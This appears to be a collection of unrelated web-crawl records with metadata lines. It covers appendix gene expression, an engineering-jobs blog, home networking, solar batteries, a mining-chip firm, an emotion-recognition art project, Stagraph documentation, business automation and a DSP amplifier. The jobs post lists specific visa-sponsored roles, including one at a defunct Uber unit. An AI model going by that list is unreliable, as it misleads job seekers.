The appendix-specific proteome The appendix, also called appendix vermiformis, is a blind-ended short intestinal protrusion extending from the large intestine's cecum. The histology of the appendix resembles the histology of the colon, with the four layers of mucosa, submucosa, muscularis externa and serosa. Unlike the large intestine, however, the submucosa of the appendix contains nodules of lymphoid tissue. The transcriptome analysis shows that 71% (n=13903) of all human proteins (n=19613) are expressed in the appendix and 200 of these genes show an elevated expression in appendix compared to other tissue types. An analysis of the genes with elevated expression in appendix, with regards to function, reveals that they are dominantly involved in immune system processes. - 2 appendix enriched genes - 200 genes defined as elevated in the appendix - Most of the elevated genes in appendix encode proteins involved in immune system processes - Most group-enriched genes are shared with lymph node Figure 1. The distribution of all genes across the five categories based on transcript abundance in appendix as well as in all other tissues. 200 genes show some level of elevated expression in the appendix compared to other tissues. The three categories of genes with elevated expression in appendix compared to other organs are shown in Table 1. Table 1. Number of genes in the subdivided categories of elevated expression in appendix. |Number of genes |At least five-fold higher mRNA levels in a particular tissue as compared to all other tissues |At least five-fold higher mRNA levels in a group of 2-7 tissues |At least five-fold higher mRNA levels in a particular tissue as compared to average levels in all tissues |Total number of elevated genes in appendix Protein expression of genes elevated in appendix The list of elevated genes (n=200) are well in-line with the function of the appendix, as it includes an overrepresentation of proteins associated with immune system processes. Among the genes elevated only in appendix (n=153) there is an overrepresentation of proteins involved in response to stimulus and chemotaxis, indicative of an active inflammation. CXCR1 and CXCR2, two receptors for IL-8 (also known as neutrophil chemotactic factor), both show an enhanced expression in appendix. IL-8 induces chemotaxis in neutrophils, and thereby neutrophils are attracted to the site of infection. An inflammatory reaction pattern could reflect that appendix samples were obtained from cases with some degree of appendicitis. There were only two genes in the category of genes with tissue enriched expression in the appendix ACOD1 and TNFRSF6B. This is not unexpected as the included cell types, function and morphological features of the appendix are highly similar to other related tissue types, such as the lymph node, tonsil and spleen. Genes that specifically signify these types of tissues will thus be categorized as group enriched genes (see below). The appendix transcriptome An analysis of the expression levels of each gene makes it possible to calculate the relative mRNA pool for each of the categories. The analysis shows that 86% of the mRNA molecules in the appendix corresponds to housekeeping genes and only 2% of the mRNA pool corresponds to genes categorized to be either appendix enriched, group enriched, or enhanced. Thus, most of the transcriptional activity in the appendix relates to proteins with presumed housekeeping functions as they are found in all tissues and cells analyzed. Proteins specifically expressed in neutrophils One of the most highly expressed genes in the appendix is FPR1. FPR1 encodes a G protein-coupled receptor protein expressed by e.g. neutrophils, and plays a role in chemotaxis, phagocytosis and generation of reactive oxygen species. The immunohistochemical staining shows strong positivity in a cell population indicative of phagocytes in bone marrow, appendix, as well as in many other tissues. Proteins specifically expressed in peripheral blood leukocytes The FCN1 gene shows an elevated expression in appendix and bone marrow. M-ficolin encoded by the gene FCN1 is predominantly expressed in peripheral blood leukocytes, and has been postulated to function as a plasma protein with elastin-binding activity. Proteins specifically expressed in endothelial cells The VIP gene, vasoactive intestinal peptide, encodes for a 28-amino-acid polypeptide, which stimulates the secretion of electrolytes and water by the intestinal mucosa. The VIP gene shows an elevated expression in appendix, colon, rectum, smooth muscle and small intestine, and immunohistochemical staining reveals distinct positivity in blood vessel endothelial cells. Proteins specifically expressed in B-cells The lymphoid nodules of the appendix contain dense collections of B-lymphocytes, as shown by the elevated expression of the MS4A1 gene in appendix, spleen, lymph node and tonsil. The protein CD20 encoded by the MS4A1 gene is an activated-glycosylated phosphoprotein expressed on the surface of B-cells beginning at the pro-B phase with progressively increasing concentrations until maturity. Genes shared between appendix and other tissues There are 47 group-enriched genes expressed in the appendix. Group enriched genes are defined as genes showing a 5-fold higher average level of mRNA expression in a group of 2-7 tissues, including appendix, compared to all other tissues. In order to illustrate the relation of appendix tissue to other tissue types, a network plot was generated, displaying the number of genes shared between different tissue types. Figure 2. An interactive network plot of the appendix enriched and group enriched genes connected to their respective enriched tissues (grey circles). Red nodes represent the number of appendix enriched genes and orange nodes represent the number of genes that are group enriched. The sizes of the red and orange nodes are related to the number of genes displayed within the node. Each node is clickable and results in a list of all enriched genes connected to the highlighted edges. The network is limited to group enriched genes in combinations of up to 4 tissues, but the resulting lists show the complete set of group enriched genes in the particular tissue. The network plot shows that most genes are shared with lymph node, although most genes shared with lymph node are also shared with other tissues harboring a major component of lymphoid cells, i.e. tonsil and spleen. It is well accepted that the immune tissue called gut associated lymphoid tissue (GALT) is important for fighting pathogens passing through the glandular epithelium of the gut. However, the function of the appendix is much debated due to the apparent lack of importance, as judged by an absence of side effects following appendectomy. One hypothesis is that the appendix constitutes a vestigial remnant of a once larger cecum, while another hypothesis suggests that it acts as storage for beneficial bacteria during times of illness. Figure 3. Schematic view of the appendix. Attribution: By Mariana Ruiz Villarreal (LadyofHats) (Own work) [Public domain], via Wikimedia Commons. Source. Image has been cropped. The histology of human appendix including detailed images and information can be viewed in the Protein Atlas Histology Dictionary. Here, the protein-coding genes expressed in the appendix are described and characterized, together with examples of immunohistochemically stained tissue sections that visualize protein expression patterns of proteins that correspond to genes with elevated expression in the appendix. Transcript profiling and RNA-data analyses based on normal human tissues have been described previously (Fagerberg et al., 2013). Analyses of mRNA expression including over 99% of all human protein-coding genes was performed using deep RNA sequencing of 172 individual samples corresponding to 37 different human normal tissue types. RNA sequencing results of 3 fresh frozen tissues representing normal appendix was compared to 169 other tissue samples corresponding to 36 tissue types, in order to determine genes with elevated expression in appendix. A tissue-specific score, defined as the ratio between mRNA levels in appendix compared to the mRNA levels in all other tissues, was used to divide the genes into different categories of expression. These categories include: genes with elevated expression in appendix, genes expressed in all tissues, genes with a mixed expression pattern, genes not expressed in appendix, and genes not expressed in any tissue. Genes with elevated expression in appendix were further sub-categorized as i) genes with enriched expression in appendix, ii) genes with group enriched expression including appendix and iii) genes with enhanced expression in appendix. Human tissue samples used for protein and mRNA expression analyses were collected and handled in accordance with Swedish laws and regulation and obtained from the Department of Pathology, Uppsala University Hospital, Uppsala, Sweden as part of the sample collection governed by the Uppsala Biobank. All human tissue samples used in the present study were anonymized in accordance with approval and advisory report from the Uppsala Ethical Review Board. Relevant links and publications Uhlén M et al, 2015. Tissue-based map of the human proteome. Science PubMed: 25613900 DOI: 10.1126/science.1260419 Yu NY et al, 2015. Complementing tissue characterization by integrating transcriptome profiling from the Human Protein Atlas and from the FANTOM5 consortium. Nucleic Acids Res. PubMed: 26117540 DOI: 10.1093/nar/gkv608 Fagerberg L et al, 2014. Analysis of the human tissue-specific expression by genome-wide integration of transcriptomics and antibody-based proteomics. Mol Cell Proteomics. PubMed: 24309898 DOI: 10.1074/mcp.M113.035600 Andersson S et al, 2014. The transcriptomic and proteomic landscapes of bone marrow and secondary lymphoid tissues. PLoS One. PubMed: 25541736 DOI: 10.1371/journal.pone.0115911 Histology dictionary - appendix
systems_science
https://fixcarz.com/50-hr-engineering-jobs-in-usa-with-visa-sponsorship/
2024-04-15T19:56:02
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817014.15/warc/CC-MAIN-20240415174104-20240415204104-00697.warc.gz
0.897411
1,859
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__52478394
en
As we look towards 2024, a significant trend is emerging: an increasing number of companies are offering $50/hr engineering jobs, complete with visa sponsorship for international talents. This shift is not only a reflection of the growing need for skilled engineers but also indicates a more inclusive approach to hiring, recognizing the value of global expertise in driving innovation and growth. For engineers around the world, this presents an unprecedented opportunity. Whether you’re a seasoned professional or a recent graduate, the prospect of working in the USA with a substantial salary and the support of visa sponsorship is a game-changer. In this blog post, we’ll delve into what these roles entail, the types of engineering jobs most in demand, and how you can position yourself to be a top candidate for these lucrative positions. Stay tuned as we explore the landscape of $50/hr engineering jobs in the USA for 2024 and how you can be a part of this exciting wave of career opportunities. $50/hr Engineering Jobs in USA With Visa Sponsorship Salary figures and visa sponsorship availability can vary depending on the specific company, location, and candidate experience. This list is based on current trends and research and may not be exhaustive. 1. Software Engineer (Embedded Systems) at Tesla, Austin, TX: - Overview: Dive into the cutting-edge world of electric vehicles by developing and maintaining software for embedded systems in Tesla cars. Your work will directly impact the performance, reliability, and safety of these innovative vehicles. Expect to tackle challenges like real-time operating systems and low-level programming and ensure high-performance code execution within strict memory constraints. You’ll collaborate with a team of passionate engineers pushing the boundaries of electric vehicle technology and potentially contribute to future projects like self-driving cars and energy storage solutions. - Key Skills: C/C++, real-time operating systems, embedded systems programming, understanding of automotive systems. 2. Machine Learning Engineer at Google AI, Mountain View, CA: - Overview: Be at the forefront of artificial intelligence by designing and implementing machine learning algorithms for Google’s diverse array of products. You’ll tackle real-world problems with cutting-edge technology, shaping how millions of users interact with Google services. Expect to work with complex datasets, explore various machine learning techniques like deep learning and reinforcement learning, and collaborate with world-renowned AI experts. Prepare to continuously learn and adapt as the field of AI evolves rapidly. - Key Skills: Python, TensorFlow, machine learning principles, statistics, data analysis. 3. Backend Engineer at Amazon Web Services (AWS), Seattle, WA: - Overview: Build and maintain the backbone of the cloud computing giant, AWS. You’ll be responsible for designing, developing, and deploying highly available and scalable backend systems that power millions of users around the globe. Expect to work with distributed systems, cloud technologies like Amazon S3 and EC2, and large codebases written in languages like Java or Python. This role demands strong problem-solving skills, the ability to handle high pressure, and a passion for building robust and reliable systems. - Key Skills: Java or Python, distributed systems, cloud computing, scalability, database design. 4. Systems Engineer at SpaceX, Hawthorne, CA: - Overview: Play a crucial role in supporting SpaceX’s ambitious space exploration endeavours. You’ll design, deploy, and maintain the complex IT infrastructure that keeps SpaceX operations running smoothly, from satellite networks to launch control systems. Prepare to work with cutting-edge technologies, troubleshoot complex issues, and ensure the secure and reliable functioning of critical systems. This role demands a strong understanding of networking, security, cloud technologies and the ability to handle diverse technical challenges. - Key Skills: Networking, security, cloud technologies, IT infrastructure, problem-solving. 5. Data Scientist at Uber ATG, Pittsburgh, PA: - Overview: Shape the future of autonomous vehicles by developing and applying data science algorithms to Uber’s self-driving car technology. You’ll analyze massive datasets, build predictive models, and improve the perception, decision-making, and navigation capabilities of self-driving cars. Expect to work with cutting-edge tools like lidar and radar sensors, collaborate with experts in robotics and machine learning, and contribute to a technology that has the potential to revolutionize transportation. - Key Skills: Python, statistics, machine learning, data analysis, sensor fusion. 6. Petroleum Engineer at Schlumberger, Houston, TX: - Overview: Embark on a challenging and rewarding career in the heart of the oil and gas industry. As a Petroleum Engineer at Schlumberger, you’ll design and implement efficient drilling and production strategies for oil and gas wells. This involves a deep understanding of reservoir engineering principles, utilizing specialized software to analyze well data, and working closely with geologists and drilling crews. Prepare for exciting on-site experiences, the potential for international assignments, and the satisfaction of contributing to a vital energy source for the world. - Key skills: Reservoir engineering, petroleum software, drilling technology, well analysis, data visualization. 7. Aerospace Engineer at Boeing, Seattle, WA: Overview: Take flight with one of the leading aerospace companies in the world. As an Aerospace Engineer at Boeing, you’ll be involved in the design and analysis of aircraft structures and systems, ensuring the safety, performance, and airworthiness of these majestic machines. Expect to work with complex engineering software, collaborate with teams of experienced engineers, and potentially contribute to iconic Boeing aircraft like the 787 Dreamliner or the 737 MAX. This role demands meticulous attention to detail, strong analytical skills, and a passion for aviation technology. Key skills: Aerospace engineering principles, structural analysis, computational fluid dynamics, aircraft systems, FAA regulations. 8. Civil Engineer at AECOM, New York, NY: - Overview: Shape the urban landscape of one of the most vibrant cities in the world. As a Civil Engineer at AECOM, you’ll be involved in the design and management of critical infrastructure projects, including roads, bridges, and buildings. Expect to work with advanced design software, collaborate with architects and contractors, and ensure the structural integrity and safety of your projects. This role demands strong problem-solving skills, knowledge of building codes and regulations, and a passion for creating sustainable and resilient infrastructure. - Key skills: Structural engineering, AutoCAD, construction management, project planning, geotechnical engineering. 9. Chemical Engineer at ExxonMobil, Houston, TX: - Overview: Be at the forefront of the chemical industry by developing and optimizing processes for oil and gas production at ExxonMobil. You’ll utilize your knowledge of chemical engineering principles and process simulation software to improve efficiency, reduce emissions, and ensure the safe and sustainable extraction of these valuable resources. Expect to work in a dynamic environment, collaborate with geologists and chemical technicians, and potentially contribute to groundbreaking technological advancements in the energy sector. - Key skills: Chemical engineering principles, process simulation software, thermodynamics, fluid mechanics, reaction engineering. 10. Electrical Engineer at Tesla, Fremont, CA: - Overview: Join the electrifying world of electric vehicles and energy products by designing and developing electrical systems at Tesla. You’ll tackle diverse challenges like circuit design, power electronics, and control systems, ensuring the efficient and reliable operation of these innovative technologies. Expect to work with cutting-edge components, collaborate with a team of passionate engineers, and potentially contribute to projects like the Powerwall home battery system or the highly anticipated Cybertruck. This role demands strong electrical engineering fundamentals, knowledge of control theory, and a passion for pushing the boundaries of clean energy technology. - Key skills: Circuit design, power electronics, control systems, motor control, renewable energy. As we conclude our exploration of the $50/hr engineering jobs in the USA with visa sponsorship for 2024, it’s clear that the opportunities are both diverse and plentiful. From the innovative world of software engineering in bustling tech hubs to the critical infrastructure projects managed by civil engineers, the landscape is ripe with prospects for talented engineers worldwide. These roles not only offer financial rewards but also the chance to be at the forefront of technological and industrial advancements. The added benefit of visa sponsorship makes these positions even more accessible to international talent, signalling a more inclusive and globally connected engineering workforce. For engineers aspiring to take their careers to new heights, the USA in 2024 presents a landscape of opportunity. Whether it’s contributing to the next generation of technology in Silicon Valley, designing sustainable infrastructure, or pushing the boundaries of machine learning, the scope for impact and growth is immense. As industries continue to evolve and integrate new technologies, the demand for skilled engineers is set to remain high, making this an ideal time to pursue these lucrative and fulfilling career paths. For those ready to embark on this journey, the future is not just promising; it’s bright with potential.
systems_science
http://www.digitalhomenetworks.com/home-computer-networks/
2022-12-04T04:47:51
s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710962.65/warc/CC-MAIN-20221204040114-20221204070114-00766.warc.gz
0.94319
471
CC-MAIN-2022-49
webtext-fineweb__CC-MAIN-2022-49__0__29333035
en
Home Computer Networks Design & Installation Service Home computer networks were originally installed to support maybe just one “techy” user for email and internet access. Going back a few years; most families either didn’t need or couldn’t afford more than one computer. Nowadays, in addition to using computers for e-mail, people use them for schoolwork, shopping, instant messaging, downloading music and videos, and playing games. For many families, one computer is no longer enough. In a household with multiple computers, a home computer network often becomes a necessity rather than an expensive luxury. Computer networks for the home can be installed using either wired or wireless technology. A wired system has been the traditional choice in homes, but Wi-Fi wireless technologies have surpassed the use of Wired in recent years. Both wired and wireless can claim advantages over the other; both represent practical options for home. The home computer network has evolved to support a growing number of networkable devices which include; CCTV Systems, TV Systems, Home Media Servers, Blu-Ray Recorders, VoIP Telephone Systems and Alarm Systems. Many of these modern devices can be accessed and controlled by a computer’s web browser or product specific software. Home entertainment products that have built in DNLA functionality will allow the sharing of content between a wide range of products connected to a home computer network. For example; you could record a TV programme on a recording device located in the lounge, then playback the content on a TV located in an upstairs bedroom without physically moving the record device. The content is simply streamed over your WiFi or Wired home network. Prior to quoting for the installation of our home computer networks, one of our technical engineers will visit your home to perform a site survey. We encourage potential customers to take an active role in this process to ensure that you have a full appreciation of what is required. Our system engineer will then prepare a fully itemised quotation, which details all of the equipment required to install a system which fully meets all of your home computer network requirements. For further information, advice or a quotation on our home computer networks, please email us. Our home computer network installers are available in Redditch, Bromsgrove, Droitwich, Evesham, Worcester and Birmingham areas.
systems_science
https://www.rfepl.com/copy-of-energy-storage-system
2024-02-26T12:02:58
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474659.73/warc/CC-MAIN-20240226094435-20240226124435-00286.warc.gz
0.935433
2,173
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__203972807
en
Storage acts as an Insurance Policy for Sunshine. If you’ve been looking to install a solar panel system recently, you’ve probably come across the topic of solar batteries. Despite the fact that battery systems are becoming increasingly popular, many still don’t know a lot about them. India with abundant sunshine and a unique confluence of supply and demand situation is an ideal location to combine solar with ESS (energy storage system). Solar batteries let you store the energy that your solar panels produce for later use. Pairing your solar panels with solar batteries to create what is known as a ‘hybrid solar system’ comes with a number of advantages, including access to reliable backup power and independence from your utility. But how exactly do solar batteries work? And more importantly, how much do they cost? Keep reading to find out. Energy Storage System How Solar & Batteries Work? Solar batteries store the extra solar energy your panels produce that you don't immediately use, so you can draw from it later. See, solar panels produce the most electricity during the middle of the day, which also happens to be the time when your home uses the least amount of electricity. With a regular grid-tied solar system, that excess solar energy gets sent back to the utility grid. However, when solar panels are paired with a battery, that excess electricity goes into the battery instead of going to the grid. Then, when the sun goes down and your panels aren’t producing electricity anymore, you can use the energy you have stored in your battery - instead of paying for electricity from the utility. This means you get to power your home/business with all of the clean, renewable solar power your solar panels produce no matter what time of day it is. Factors that determine battery cost Solar + Storage What are the benefits of adding a solar battery to your solar power system? Whether you're thinking about installing a new solar power system, or you’ve already gone solar, energy storage can help you leverage the full potential of your solar panels. By storing the excess energy your solar panels produce, solar-plus-storage provides a reliable, low-cost power backup option so when the sun goes down, the clouds roll in, or the lights go off in your community, you always have power on hand and savings in store. There are a variety of solar battery benefits that many consider when deciding to integrate energy storage into their solar power system design: Perhaps the ultimate reason for why you might want a solar battery installation. Solar energy storage technology enables you to have more control over where your energy comes from, how it gets used, and what you can do with it. Solar and storage can provide backup power during an electrical disruption. They can keep critical facilities operating to ensure continuous essential services, like communications. Firming Solar Generation Short-term storage can be used to ride through a brief generation disruption from a passing cloud, helping maintain a “firm” electrical supply that is reliable and consistent. Reduce Demand Charge Batteries can be used to shave peak usage hours by self-consumption of solar-generated energy stored in a battery instead of importing electricity from the grid. Increase Your Savings Energy storage can help maximize the financial savings you get from solar if you don’t have access to one-to-one net metering by allowing you to draw power from the battery instead of the grid. Thus consuming more of the solar power you produce on site. By increasing the energy-producing potential of your solar PV system, you can reduce your fossil fuel usage even more, reducing your environmental carbon footprint, and supporting technologies that will help continue the international drive towards a better climate future. Adding a solar battery while staying connected to the grid gives you even more control over your electricity, and helps use the full capacity of your solar panels without letting any excess electricity go to waste. Are solar batteries worth the extra cost? Although pairing solar panels with energy storage is becoming more common, it doesn’t mean it’s the right choice for everyone. Installing a solar battery storage solution provides the greatest benefits to those who lives in areas that experience frequent power outages and where full-retail net metering isn’t offered. Solar batteries are also great if your main reasons for going solar are environmental, as it maximises the amount of renewable energy you use. However, if you’re only looking to save extra money, a solar battery might not be worth it for you. What we mean is, if you live in a state with full-retail net metering, you’ll be saving the same amount of money with a battery as you would without one. All the battery would be doing is adding thousands of rupees to your solar installation and providing you peace of mind in the event of a power outage. To see if you’re a good fit for storage, and if storage is right for you, read this blog. How much does storage cost? While solar is primarily a financial decision for most people, storage is typically a resilience or peace of mind purchase. However, that doesn’t mean that the cost of storage is insignificant: storage can cost nearly as much as installing solar on its own. Perhaps the biggest factor in the cost of a battery installation is the equipment itself: what battery are you installing and how many of them do you need; what chemistry does it use to store energy and the electrical work required for your installation. There are a few key factors that determine how much your energy storage system will cost: There are a few different types of batteries available for home and business owners on the market today and each material has different characteristics, with its own advantages and disadvantages. Though the most common ones typically use some form of lithium ion chemistry to store electricity. Lithium-ion solar batteries like Tesla Powerwall and LG Chem are popular for their compact design, higher Depth of Discharge rating, and extended lifespan compared to lead-acid batteries. Because of these benefits, lithium-ion batteries are typically more expensive than other solar battery types, but this initial investment can pay off over time. Also, some homeowners choose to use lead-acid batteries instead of lithium-ion batteries because they are cheaper, they tend to have a shorter lifespan, lower capacity, and require regular maintenance. The key difference: if you buy a Lithium battery, most are warrantied for 10 years, and many last even longer than that. With a Lead acid battery, you have to replace the battery bank 2-3 times over that same time frame. Capacity & Power Solar battery capacity is the amount of power a battery can store, measured in kilowatt-hours, or kWh. Solar battery capacity determines how long you can power your home with the energy stored in the battery. Solar battery power rating is what tells you how much power the battery can deliver all at once, measured in kilowatts. The higher the power rating, the more devices you can power at the same time. A battery with a low capacity and a high power rating means the battery is capable of powering many appliances at once, but for a short period of time. In contrast, a battery with a high capacity and a low power rating can only power a few electronic appliances at once, but it can do so for an extended amount of time. Power and capacity isn’t an either/or comparison, and a good battery can offer both a large capacity and a high power rating, so you’ll want to just keep an eye on both features and find the right combination for your family’s needs. Depth of Discharge Depth of Discharge is the maximum percentage of a battery’s capacity that can safely be used without the need for a recharge. Draining a battery completely can actually damage the battery, so the Depth of Discharge helps you understand how much of a battery’s total capacity can actually be used. For example, a battery with a 10 kWh capacity and 90% depth of discharge rating tells you that you shouldn't use more than 9 kWh (90% of 10 kWh) before recharging to avoid damaging the battery and shortening its lifespan. The higher the Dept of Discharge, the more of your battery you can actually use on a day-to-day basis. When a battery stores or distributes electricity, some energy turns into heat during transmission, and some is needed to run the technology inside of the battery itself, so it's not possible to draw back the same amount of energy that you feed into a solar battery. Therefore, round-trip efficiency measures the percentage of energy you can get back from a battery, compared to what the solar panels feed into the battery. For example, if you feed 10 kWh into your battery, but you can only get 8 kWh back, the battery has an 80% round-trip efficiency The warranty terms help you determine how long you can expect a solar battery to last. Warranty terms specify the number of cycles (one cycle = one charge and discharge) that the battery should last, as well as the capacity it should retain, before the warranty expires. As the battery's cycles increase, its ability to retain a charge decreases. For example, you might get a 10 year, 5,000 cycle, 70% capacity warranty, which means that if the battery is less than 10 years old and has had less than 5,000 cycles, it should have at least 70% of its original capacity remaining. The warranty that comes with a battery impacts the price of that battery. Typically, more expensive batteries are going to include longer or better warranty terms, and that warranty can prevent you from dealing with issues down the road as your battery gets older. Where can I get the best solar battery? RF ENERGY has been helping thousands of home/business owners across north India access clean solar energy. Our end-to-end solutions promise results that you can track, and savings you can count on. With many years of experience designing solar power systems that include battery storage to maximise your savings, we have the knowledge needed to precisely determine which battery option will work best for you. Whether your intent is to back up your power system or reduce utility demand fees, we have a solution that will meet your needs. Getting your free estimate is the easiest way to compare solar storage options, We look forward to helping you get started on a journey towards energy independence.
systems_science
https://www.fusionsiliconminers.com/?add-to-cart=11
2020-07-05T16:17:26
s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655887377.70/warc/CC-MAIN-20200705152852-20200705182852-00434.warc.gz
0.939149
253
CC-MAIN-2020-29
webtext-fineweb__CC-MAIN-2020-29__0__255481531
en
Shenzhen Fusionsilicon Semiconductor Co., Ltd. has been focusing on the R&D and manufacturing of semiconductor products and solutions. The whole team comes from large chip design enterprises. The core team has more than 15 years of experience in integrated circuit design and has strong algorithm and protocol analysis ability. Focus on digital money mining industry chain chip design and complete machine design, R&D, production. It has a rich product line of various super computing chips. A large number of customer resources have been gathered around the world, including Russia, Viet Nam, Australia, the United States, India, etc. With its strong R&D investment and scientific research strength, Rapidly grow into an excellent encryption chip R&D enterprise in the industry. The company has perfect marketing system, stable supply channel and abundant product inventory. Global businesses can respond to customer needs and provide efficient service support. Adhering to the service concept of \"exceeding customer expectations\" , Panth Semiconductor has been committed to providing high-quality, high-efficiency and reliable products for global customers, becoming the world\'s leading encryption chip design enterprise. We will work together with many partners to promote the continuous and benign development of the blockchain industry with technology.
systems_science
https://create.treydenc.com/e-motion
2024-02-23T00:31:19
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947473871.23/warc/CC-MAIN-20240222225655-20240223015655-00208.warc.gz
0.956709
341
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__200289750
en
e-Motion aims to examine the way humans and non-humans read and interpret emotional expressions. The work realizes the difficulty of translation of ‘feelings’ into words. We analyse the complexity of emotion recognition by comparing human and computer vision, reducing the subject’s emotion input to facial expression seen through a digital screen. We compare the accuracy of the classification between the human and computer vision by asking the participant to detect their own recorded expressions once completed. When we see someone smiling does it necessarily mean that this person is ‘Happy’? Our need to conceptualize and translate facial expressions into language is part of a natural learning process by which we attempt to understand the world. This process is often reductive and biased. The work also examines the impact of how we are being seen by others and how this in return changes our behavioral responses. When we are told that we seem tired, angry or sad, and we don't identify as such, how does it make us feel? Technologies that we design often reflect our own world views. The AI system used in this project is trained to recognize facial expressions as one of seven human defined primary emotions. Such ocular-centric systems are built to estimate aspects of an individual’s identity or state of mind based on external appearances. This design brings to mind pseudo-scientific physiognomic practices, which are notorious for their discriminatory nature and surface up too often in AI based computer vision algorithms. The use of both AI analysis and human analysis of facial expressions reminds us that the technology is far from maturing beyond its maker, and that both humans and machines still have much to learn.Created in collaboration with Avital Meshi
systems_science
http://stagraph.com/Post?Id=26&Title=How+to+Import+Data+Into+Stagraph
2024-04-22T03:06:08
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296818072.58/warc/CC-MAIN-20240422020223-20240422050223-00164.warc.gz
0.909861
466
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__51589889
en
As the Stagraph runs on top of R Terminal, you can use the sample data from the environment (data_attach). You can also access the data that you’ve prepared instantly through the built-in R Console. Another option offered by Stagraph is the built-in Spreadsheet editor, which allows you to prepare input data directly in the program. For this purpose, the data_create function is used. The advantage of this feature is that your data is automatically stored in the project file. However, this is useful only if you want to work with small dataset. In the case of larger datasets, it is appropriate to separate the input data from the project file. If the current capabilities of Stagraph interface does not fit your needs, you can also use (in addition to the built-in options) data import options through the scripts in R language. For this purpose the data_custom functions is used. Thanks to this feature, you are not limited only to supported data sources and you can use the full power of R language. Excel files are frequently used for data storing and sharing. Excel spreadsheet is a relatively simple interface and very widespread among users. Therefore, support for data import from Excel files is directly integrated into Stagraph interface (data_excel). Another interesting source of data in Stagraph is the spatial data from R package named maps. You can use this package directly in the Stagraph interface (data_map, data_cities). Data from this group is often used as a base layers for analyzing and visualizing other spatial data. Documentation for Data Import functions is not complete. Remaining is to describe the import of data from CSV and DBF files and finally the data import from databases via ODBC Connection. This part of the functionality will be gradually complemented in future versions, mostly according to the requests of the users. If you want to see in next version support for your favorite type of data, do not hesitate to contact me. Also keep in mind that data import is not limited in Stagraph 2.0. So you can use the individual features in the Free version without limitation to the type of size of the data. If you like the article, please share it. And do not forget to try the free version.
systems_science
http://busde-tabi.com/future-proofing-operations-embracing-business-automation-for-long-term-success.htm
2024-04-20T13:02:22
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817650.14/warc/CC-MAIN-20240420122043-20240420152043-00779.warc.gz
0.913365
615
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__17733016
en
Future-proofing operations have become an imperative for businesses seeking long-term success in an increasingly dynamic and competitive environment. Embracing business automation stands out as a pivotal strategy in this pursuit, offering a myriad of benefits that extend far beyond immediate gains. At its core, automation revolutionizes the way organizations operate, enabling them to adapt, innovate, and thrive in the face of evolving challenges and opportunities. One of the key advantages of business automation lies in its ability to enhance operational efficiency. By automating repetitive tasks and workflows, companies can streamline processes, reduce manual errors, and optimize resource utilization. This efficiency not only translates into cost savings but also frees up valuable human capital to focus on strategic initiatives that drive growth and innovation. From automating routine administrative tasks to orchestrating complex production processes, automation empowers organizations to do more with less, laying a solid foundation for sustainable success in the long run. Moreover, business automation fosters agility and adaptability, essential qualities for navigating uncertain terrain. In today’s fast-paced market landscape, the ability to respond swiftly to changing customer demands, market trends, and competitive pressures is paramount. Automated systems enable organizations to dynamically adjust operations, scale resources, and pivot strategies in real-time, ensuring they remain agile and resilient in the face of disruption. Whether it is rapidly reconfiguring supply chains to mitigate supply chain disruptions or personalizing marketing campaigns to capitalize on emerging opportunities, automation equips businesses with the flexibility to stay ahead of the curve and seize new possibilities as they arise. Furthermore, automation serves as a catalyst for innovation and growth, fueling a culture of continuous improvement within the organization. By automating mundane tasks and workflows, employees are liberated to focus on higher-value activities that require creativity, critical thinking, and strategic foresight. This unleashes a wave of innovation across the organization, driving the development of new products, services, and business models that differentiate the company in the marketplace. Whether it is leveraging AI-driven insights to unlock new customer segments or automating R&D processes to accelerate product development cycles, automation empowers businesses to innovate at scale and stay ahead of the competition. Additionally, enables organizations to harness the power of data-driven decision-making, unlocking actionable insights that drive strategic outcomes. By integrating analytics tools with automated systems, companies can leverage vast amounts of data to gain deep visibility into their operations, customer behavior, and market dynamics. This enables them to make informed decisions with confidence, identify emerging trends, and capitalize on untapped opportunities. From predictive analytics that forecast future demand to prescriptive analytics that optimize resource allocation, data-driven automation empowers organizations to stay ahead of the curve and make proactive decisions that drive long-term success. In conclusion, embracing business automation is essential for future-proofing operations and ensuring long-term success in an increasingly volatile and competitive landscape. From optimizing processes to empowering employees and driving strategic insights, automation lays the groundwork for sustainable growth and differentiation, positioning businesses for success both now and in the future.
systems_science
https://sklep.basser.pl/en/amplifiers/908-helix-dsp-ultra-12-channel-amplifier.html
2022-12-08T02:42:13
s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446711232.54/warc/CC-MAIN-20221208014204-20221208044204-00031.warc.gz
0.91974
706
CC-MAIN-2022-49
webtext-fineweb__CC-MAIN-2022-49__0__106611690
en
Price includes 23% VAT The name says it all – the new HELIX DSP ULTRA is anything but another signal processor with just more channels. Rather, it is the next technological milestone that impressively demonstrates Audiotec Fischer's expertise in the field of DSP technology. Computing power can only be replaced by even more computing power – and that's why the DSP ULTRA is equipped with two of the most powerful 64 Bit audio signal processors from Analog Devices. Incredible 2.4 billion MAC operations per second make the twelve separately processed channels and the multitude of new sound features in combination with the high sampling rate of 96 kHz (resulting in an audio bandwidth of over 40 kHz) possible. Rapid processing power not only in the signal path – the particularly fast 32 Bit ACO platform takes over all control tasks and ensures the decisive speed increase, especially for data communication with our DSP PC-Tool software, but also for the lightning-fast switching between up to ten possible sound setups. But ACO offers much more – fantastic sound effects such as Augmented Bass Processing or StageXpander are implemented as well as a channel-separated Input EQ including Input Signal Analyzer (ISA) for easy analysis and compensation of input signals of OE radios, which already include a sound setup ex works. The HELIX DSP ULRA justifies its name not only in terms of functionality, but also with respect to sound quality. An extremely complex and newly designed analog input stage ensures phenomenal sound characteristics with full high-res audio bandwidth up to more than 40 kHz. But that's not all – tremendous effort was put into filtering out any unwanted interference in the power supply of the individual stages. In addition, only particularly low-noise operational amplifiers from TI / BurrBrown's legendary "OPA series" are now used. The adaptation to modern OE sound systems via an increasing number of inputs has a significant impact on the complexity of the signal routing inside the processor. Especially when several input signals are mixed together and then split again into multi-way systems, 